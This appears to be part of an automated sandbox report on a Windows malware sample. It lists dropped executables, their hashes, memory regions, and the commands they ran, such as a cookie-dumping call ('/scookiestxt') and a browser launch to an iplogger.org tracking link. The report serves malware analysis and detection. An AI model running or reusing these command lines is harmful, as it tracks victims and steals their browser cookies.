C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 9964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1jF6h73⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffea46446f8,0x7ffea4644708,0x7ffea46447184⤵
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 47081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4752 -ip 47521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
de477c625e69a07beb047419ff93d06a
SHA1e843c5967dffa6ebd94c3083da5a14b60233de04
SHA256ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552
SHA512ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datMD5
de477c625e69a07beb047419ff93d06a
SHA1e843c5967dffa6ebd94c3083da5a14b60233de04
SHA256ef9f3d593299cd93c5af6d5fa2e78c891fee00cf101fa440723e8edafe09d552
SHA512ba7acbcec1b157f9d326d4bf9e1a2c8c1bad7f6e44e2dac0531a95562cfd9de599ea5cf8617a0b3856b456d34073002f258468afd42fba2e0fbc44300f4c3b1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoMD5
e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Temp\CC4F.tmpMD5
4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1e16506f662dc92023bf82def1d621497c8ab5890
SHA256767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA5129da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
979da759d9b79556889c6e6b99472300
SHA14e946769591ad513b252868958b9312ea7d85fcd
SHA25664eb769c9f9df0f729ae2cf40a825f9527dfdf3c200b7599e0e2baefbe4bbca6
SHA512d5f9d16a427e6cf5edd504d49b285039e6aac2bd96d1e9d6af08d06e22791d71416ba94b6a4cc3cebe04589f6c1ec1ff07125b40063f32f182c07c0cd72f7a9d
-
C:\Users\Admin\AppData\Local\Temp\Files.exeMD5
979da759d9b79556889c6e6b99472300
SHA14e946769591ad513b252868958b9312ea7d85fcd
SHA25664eb769c9f9df0f729ae2cf40a825f9527dfdf3c200b7599e0e2baefbe4bbca6
SHA512d5f9d16a427e6cf5edd504d49b285039e6aac2bd96d1e9d6af08d06e22791d71416ba94b6a4cc3cebe04589f6c1ec1ff07125b40063f32f182c07c0cd72f7a9d
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exeMD5
612730ae4c4a79876407a49a6b3a5aff
SHA1ba5eca06192b70a25c22693cbd8835f197c1f4d1
SHA256050a7738498b315438447ee86f51dc6319b35e7546dd3f7a4dcea7d7c4ab9b3e
SHA51265f2e9dbfee3781e3fd97325d92058c22d5e9655df4f085811ccee8d26589c4644e6b40abbe0c1733ca47c55dfabacead91da9a564be8eee2d68b0f241acbae8
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exeMD5
612730ae4c4a79876407a49a6b3a5aff
SHA1ba5eca06192b70a25c22693cbd8835f197c1f4d1
SHA256050a7738498b315438447ee86f51dc6319b35e7546dd3f7a4dcea7d7c4ab9b3e
SHA51265f2e9dbfee3781e3fd97325d92058c22d5e9655df4f085811ccee8d26589c4644e6b40abbe0c1733ca47c55dfabacead91da9a564be8eee2d68b0f241acbae8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exeMD5
8227b82d4a4a5757f752cfcb0ddae28e
SHA1101e6f411c232b5f1e03d6ed2c1f8fcdc4909a13
SHA256ab671264bcd07683a5b204b143968f03cbbf6318220faadad6d905ea1a748ea3
SHA512ee3b0486a0dd87099237c795c4cb7cd4632dc5ad78c325197a9f8d042411216dd1bdd53e5f00bf745bd3b0b1f9fe1359e5760520b9e8166057d7a5b49b0f6817
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exeMD5
8227b82d4a4a5757f752cfcb0ddae28e
SHA1101e6f411c232b5f1e03d6ed2c1f8fcdc4909a13
SHA256ab671264bcd07683a5b204b143968f03cbbf6318220faadad6d905ea1a748ea3
SHA512ee3b0486a0dd87099237c795c4cb7cd4632dc5ad78c325197a9f8d042411216dd1bdd53e5f00bf745bd3b0b1f9fe1359e5760520b9e8166057d7a5b49b0f6817
-
C:\Users\Admin\AppData\Local\Temp\agdsk.exeMD5
9531769e4efd084dd7f81f20dde745c5
SHA143e7415d5f5f0489363909fe63078a240edee012
SHA256964d16e47507956196b61e3c302dee27ccc3cf42b5640afb93da3bd359bd9c66
SHA512271cad1f03f487d4ab175d356fbcbe4227bd1f4aea7f9d5813dfa9d3bb747eb11565520e3d216c976d5075b5805c60238cf0cd0228267bb7b4126b161f3cfd0f
-
C:\Users\Admin\AppData\Local\Temp\agdsk.exeMD5
9531769e4efd084dd7f81f20dde745c5
SHA143e7415d5f5f0489363909fe63078a240edee012
SHA256964d16e47507956196b61e3c302dee27ccc3cf42b5640afb93da3bd359bd9c66
SHA512271cad1f03f487d4ab175d356fbcbe4227bd1f4aea7f9d5813dfa9d3bb747eb11565520e3d216c976d5075b5805c60238cf0cd0228267bb7b4126b161f3cfd0f
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
48bed3304e043907d99a7accfaa60f55
SHA11679826fd455ca27f582cfbd1b08e44e7eac0728
SHA256391c0b7e198cee80dbf52840840cbe4d5ddfa1993007e465b4286f7ff7124a53
SHA51238da18cde7cf4895712d5c15f3fca7aab643e90ef82cf308128acf1bafbaf929993a40fc104e83e01d48af008722c3075bf59f190c17b44a0b77cff852abe3a1
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txtMD5
b7161c0845a64ff6d7345b67ff97f3b0
SHA1d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA51298d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680
-
C:\Users\Admin\AppData\Local\Temp\install.datMD5
83df536f22197802c67688aec85a63a8
SHA1e804152d946fd5dcb51bacbf192744b7bf85d71f
SHA256e3c5591919b3baa85a4b38eb02b605d4c0e51634b5c9385863a9672e87a711a4
SHA5121a862072d473e7820ecf04d0404955b79df4187a9278eccd214f9fd635b15c466a77846e306b05a7e2143c7ea272289867dc8c77b5a4fd3f6752398934328dda
-
C:\Users\Admin\AppData\Local\Temp\install.dllMD5
b29f18a79fee5bd89a7ddf3b4be8aa23
SHA10396814e95dd6410e16f8dd0131ec492718b88da
SHA2569d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e
SHA512f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd
-
C:\Users\Admin\AppData\Local\Temp\install.dllMD5
b29f18a79fee5bd89a7ddf3b4be8aa23
SHA10396814e95dd6410e16f8dd0131ec492718b88da
SHA2569d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e
SHA512f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exeMD5
d0e5c31e51394e9074a5a6846f30fa66
SHA16277e6d73a3644cd621d3e579d420778e327c319
SHA2562bbe188a30253ed5ed8d4211c6a21dc8abdc9c7fe9fd517a972e3f5473acbe37
SHA5129ea1b66d88318112f0813aea06d173d39db075a49d09c3fad1470abb917ad5a0b1e74549af7baadcc41d4d1854d889a81b9e464044a66c2be03caac868621c40
-
C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exeMD5
d0e5c31e51394e9074a5a6846f30fa66
SHA16277e6d73a3644cd621d3e579d420778e327c319
SHA2562bbe188a30253ed5ed8d4211c6a21dc8abdc9c7fe9fd517a972e3f5473acbe37
SHA5129ea1b66d88318112f0813aea06d173d39db075a49d09c3fad1470abb917ad5a0b1e74549af7baadcc41d4d1854d889a81b9e464044a66c2be03caac868621c40
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
533e4744687b587555e0b721da6a5eb6
SHA1f27aa8aeb98698024148054801d7ecb9352c205a
SHA2566198565478c35450a1cc92e18b0a17dc5cde2c0b20e28a5266959ed6d77afdff
SHA5128c0da1291e831b394b31b09e1f597dc3cfb327bf251ad93c5be3bf1c98962267a096dca39e7f5611438e1a9e67b66055aa66c668f42feafeb999b7a8336f6a14
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
533e4744687b587555e0b721da6a5eb6
SHA1f27aa8aeb98698024148054801d7ecb9352c205a
SHA2566198565478c35450a1cc92e18b0a17dc5cde2c0b20e28a5266959ed6d77afdff
SHA5128c0da1291e831b394b31b09e1f597dc3cfb327bf251ad93c5be3bf1c98962267a096dca39e7f5611438e1a9e67b66055aa66c668f42feafeb999b7a8336f6a14
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exeMD5
8cbde3982249e20a6f564eb414f06fe4
SHA16d040b6c0f9d10b07f0b63797aa7bfabf0703925
SHA2564a8a37d0010b2a946e9b202ea07d8b93a29a3ea9a56852678307076e10999c83
SHA512d84863489b5fb2d17ee1df47de735a88d510bb8f5e378126243e34edb017d3ed82807c7dbd5cf6a977601f0e440be12e680679f1ce472619fd0ebbe9579c3e1b
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exeMD5
8cbde3982249e20a6f564eb414f06fe4
SHA16d040b6c0f9d10b07f0b63797aa7bfabf0703925
SHA2564a8a37d0010b2a946e9b202ea07d8b93a29a3ea9a56852678307076e10999c83
SHA512d84863489b5fb2d17ee1df47de735a88d510bb8f5e378126243e34edb017d3ed82807c7dbd5cf6a977601f0e440be12e680679f1ce472619fd0ebbe9579c3e1b
-
C:\Users\Admin\AppData\Local\Temp\wf-game.exeMD5
c257b4bc919bb8879e93d8bda00d33a8
SHA13ddec6c642927192dd18f2d537aaa1543353309f
SHA256ba049c72c711c97dcd741fdbbba21544c74808ac37fb64fb2a1e45e4dcc0f48a
SHA5127a1b09fa5abd064d28bd6c13c850ceac707a9e2f670829957520d81917a110fc25e4f95d213a1b26e2f87afbdbc638785adeeaa3112bf31d9a9e59749b7bac86
-
C:\Users\Admin\AppData\Local\Temp\wf-game.exeMD5
c257b4bc919bb8879e93d8bda00d33a8
SHA13ddec6c642927192dd18f2d537aaa1543353309f
SHA256ba049c72c711c97dcd741fdbbba21544c74808ac37fb64fb2a1e45e4dcc0f48a
SHA5127a1b09fa5abd064d28bd6c13c850ceac707a9e2f670829957520d81917a110fc25e4f95d213a1b26e2f87afbdbc638785adeeaa3112bf31d9a9e59749b7bac86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnkMD5
70d866a270ddce96a72e06f5ada965de
SHA1620600a1cf4ceafb4170fe8f2e98db38191ba470
SHA25620712158063b29cc568c38a6bdaf6101c92eba097b57c90df4614e659aa41082
SHA51295fcbd26a5cf5507f853cc9846c9a766ebd387bac8c07aacba7252ce10434386b73ad200c379346654cf6b307b40d5b59a30f6998cc10b7acf947dccab2f655e
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkMD5
706183dc555149ed1be9e6cf7a18e258
SHA12ed28699f06a6b941d54dfdcc8f30d895d20af65
SHA2562b58458469b2bc9b36baa98ba1b13dafdd5ccd4107ca542d7244cf3ce459ee08
SHA512bdd57727c246e49063430ba17c1286a4f9388f3623086444e521254fd256acd5cdd49d5d842c6b8a81db595885054d5436952c7ac08b5983132033e1cc9726a0
-
\??\pipe\LOCAL\crashpad_1864_HTQMLDAATPHZEDDCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/540-161-0x00007FFEC7150000-0x00007FFEC7151000-memory.dmpFilesize
4KB
-
memory/2072-203-0x0000000004240000-0x0000000004248000-memory.dmpFilesize
32KB
-
memory/2072-206-0x0000000004060000-0x0000000004068000-memory.dmpFilesize
32KB
-
memory/2072-277-0x0000000000400000-0x0000000000510000-memory.dmpFilesize
1.1MB
-
memory/2072-262-0x00000000045D0000-0x00000000045D8000-memory.dmpFilesize
32KB
-
memory/2072-207-0x0000000004060000-0x0000000004068000-memory.dmpFilesize
32KB
-
memory/2072-205-0x0000000004270000-0x0000000004278000-memory.dmpFilesize
32KB
-
memory/2072-204-0x0000000004250000-0x0000000004258000-memory.dmpFilesize
32KB
-
memory/2072-202-0x0000000004060000-0x0000000004068000-memory.dmpFilesize
32KB
-
memory/2072-201-0x0000000004040000-0x0000000004048000-memory.dmpFilesize
32KB
-
memory/2920-278-0x0000000007690000-0x00000000076A6000-memory.dmpFilesize
88KB
-
memory/3648-160-0x0000000000870000-0x0000000000879000-memory.dmpFilesize
36KB
-
memory/3648-159-0x0000000000929000-0x0000000000932000-memory.dmpFilesize
36KB
-
memory/3648-152-0x0000000000929000-0x0000000000932000-memory.dmpFilesize
36KB
-
memory/3648-166-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/4192-136-0x0000000000D80000-0x0000000000DBE000-memory.dmpFilesize
248KB
-
memory/4204-179-0x000001949A020000-0x000001949A030000-memory.dmpFilesize
64KB
-
memory/4204-178-0x0000019499990000-0x00000194999A0000-memory.dmpFilesize
64KB
-
memory/4204-180-0x000001949C710000-0x000001949C714000-memory.dmpFilesize
16KB
-
memory/4752-168-0x00000000024D0000-0x0000000002567000-memory.dmpFilesize
604KB
-
memory/4752-167-0x0000000000A48000-0x0000000000AA9000-memory.dmpFilesize
388KB
-
memory/4752-169-0x0000000000400000-0x000000000049A000-memory.dmpFilesize
616KB
-
memory/4752-153-0x0000000000A48000-0x0000000000AA9000-memory.dmpFilesize
388KB